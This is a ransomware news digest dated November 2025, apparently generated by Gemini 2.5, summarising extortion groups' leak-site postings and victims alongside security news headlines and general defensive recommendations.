Ransomware Update – 2025-11-25

[Content by Gemini 2.5]

Latest Ransomware News and New File Extensions

  • Clop:

    • New Encrypted File Extension: Not specified.
    • Attack Methods: Data exfiltration and extortion, specifically targeting and stealing data from Oracle E-Business Suite servers.
    • Targets: Educational institutions, such as Dartmouth College.
    • Decryption Status: Not applicable, as the primary threat is data leakage rather than file encryption.
    • Source: Dartmouth College confirms data breach after Clop extortion attack

  • Akira:

    • New Encrypted File Extension: Not specified.
    • Attack Methods: Data theft and extortion by threatening to publish stolen sensitive data. Leaked data includes corporate documents, employee and client PII (SSNs, passports), and financial records.
    • Targets: Legal services (Standing Chapter 13 Trustee), landscaping services, and food production companies.
    • Decryption Status: Not mentioned; the focus is on data leaks.
    • Source: 🏴‍☠️ Akira has just published a new victim : Standing Chapter 13 Trustee

  • Qilin:

    • New Encrypted File Extension: Not specified.
    • Attack Methods: Data exfiltration and publication of victims on their leak site to extort payment.
    • Targets: A wide range of sectors including senior living facilities (Nottingham Village), industrial manufacturing (HYTORC, Zecher), engineering (Blue Projects), electronics (Cal-Comp Electronics), and professional services (The Hunnicutt Law Group).
    • Decryption Status: Not mentioned.
    • Source: 🏴‍☠️ Qilin has just published a new victim : Nottingham Village

  • Thegentlemen:

    • New Encrypted File Extension: Not specified.
    • Attack Methods: Data theft and extortion with detailed victim profiling, including company revenue and operational information, on their leak site.
    • Targets: Primarily focused on companies in South America and Southeast Asia, including mining (Ecuacorriente S.A.), healthcare (AiHealth, KIM Dental), and real estate development (Singapore City Development).
    • Decryption Status: Not mentioned.
    • Source: 🏴‍☠️ Thegentlemen has just published a new victim : Ecuacorriente S.A.

  • Sinobi:

    • New Encrypted File Extension: Not specified.
    • Attack Methods: Data breach and extortion via public shaming.
    • Targets: Diverse small to medium-sized businesses across various sectors including construction (Rempe Construction), healthcare (StatMedPlus LLC, Advanced Dental), recruiting (Access Search), and cultural institutions (Homestead Museum).
    • Decryption Status: Not mentioned.
    • Source: 🏴‍☠️ Sinobi has just published a new victim : Rempe Construction

  • Ransomhouse:

    • New Encrypted File Extension: Not specified.
    • Attack Methods: Data theft and extortion.
    • Targets: Government agencies, including the Swedish Arts Council.
    • Decryption Status: Not mentioned.
    • Source: 🏴‍☠️ Ransomhouse has just published a new victim : Swedish Arts Council

  • Interlock:

    • New Encrypted File Extension: Not specified.
    • Attack Methods: Data theft and extortion, specifically leaking sensitive client/patient data (SSNs, medical histories) and mocking the victims’ poor security.
    • Targets: Healthcare (Issaqueena Pediatric Dentistry) and engineering firms (Westrian Group).
    • Decryption Status: Not mentioned.
    • Source: 🏴‍☠️ Interlock has just published a new victim : Issaqueena Pediatric Dentistry

Observations and Further Recommendations

  • A significant number of ransomware groups are actively targeting a broad and diverse range of global industries, including healthcare, legal, finance, manufacturing, government, and education.
  • The predominant tactic observed is data exfiltration for extortion (“double extortion”), where gangs threaten to leak stolen sensitive information rather than relying solely on file encryption.
  • Ransomware attack rates have reached record highs, making them a more common and damaging threat than physical disasters for many organizations.
  • The continuous attacks highlight the critical need for robust cybersecurity measures, including multi-layered defense, regular data backups, and comprehensive incident response and business continuity plans.

News Details

  • Dartmouth College confirms data breach after Clop extortion attack: ​Dartmouth College has disclosed a data breach after the Clop extortion gang leaked data allegedly stolen from the school’s Oracle E-Business Suite servers on its dark web leak site.
  • Aligning VMware migration with business continuity: In recent years, an even more persistent threat has emerged. Cyber incidents, particularly ransomware, are now more common—and often, more damaging—than physical disasters. In a recent survey of more than 500 CISOs, almost three-quarters (72%) said their organization had dealt with ransomware in the previous year.
  • ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access: A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad.
  • CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans (RATs) to target users of mobile messaging applications.
  • Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware: Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2.
  • 3 SOC Challenges You Need to Solve Before 2026: 2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns.
  • New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions: Cybersecurity researchers have discovered five vulnerabilities in Fluent Bit, an open-source and lightweight telemetry agent, that could be chained to compromise and take over cloud infrastructures.
  • Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft: Multiple security vendors are sounding the alarm about a second wave of attacks targeting the npm registry in a manner that’s reminiscent of the Shai-Hulud attack.
  • Chinese DeepSeek-R1 AI Generates Insecure Code When Prompts Mention Tibet or Uyghurs: New research from CrowdStrike has revealed that DeepSeek’s artificial intelligence (AI) reasoning model DeepSeek-R1 produces more security vulnerabilities in response to prompts that contain topics deemed politically sensitive by China.
  • ClickFix attack uses fake Windows Update screen to push malware: New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.
  • Harvard University discloses data breach affecting alumni, donors: Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.
  • ShadowRay 2.0 Turns AI Clusters into Crypto Botnets: A threat actor is leveraging a flaw in the Ray framework to hijack AI infrastructure worldwide and distribute a self-propagating cryptomining and data theft botnet.
  • Critical Flaw in Oracle Identity Manager Under Exploitation: The exploitation of CVE-2025-61757 follows a breach of Oracle Cloud earlier this year as well as a recent extortion campaign targeting Oracle E-Business Suite customers.
  • 🏴‍☠️ Akira has just published a new victim : Standing Chapter 13 Trustee: The Standing Chapter 13 Trustee District of Minnesota provides services related to bankruptcy cases under Chapter 13, assisting debtors with payment information and case-related resources. We will upload 44gb of corporate documents soon.
  • 🏴‍☠️ Payoutsking has just published a new victim : Se:
  • 🏴‍☠️ Silentransomgroup has just published a new victim : Mitchell Silberberg & Knupp: Established in 1908, Mitchell Silberberg & Knupp (MSK), is a firm that provides services such as Ventu…
  • 🏴‍☠️ Sinobi has just published a new victim : Rempe Construction: Rempe Construction specializes in construction services, offering expertise to various clients in need of reliable building solutions. With a focus on quality and customer satisfaction, they deliver tailored construction projects.
  • 🏴‍☠️ Rhysida has just published a new victim : Marlex Human Capital: Marlex Human Capital
  • 🏴‍☠️ Nightspire has just published a new victim : Balkrishna Paper Mills LTD, India: Balkrishna Paper Mills LTD, India
  • 🏴‍☠️ Qilin has just published a new victim : Nottingham Village: N/A
  • 🏴‍☠️ Thegentlemen has just published a new victim : Ecuacorriente S.A.: Ecuacorriente S.A is a mining company. It is operated by China Railway Construction Copper Crown Investment Co., Ltd. Revenue – $1.11 billion USD.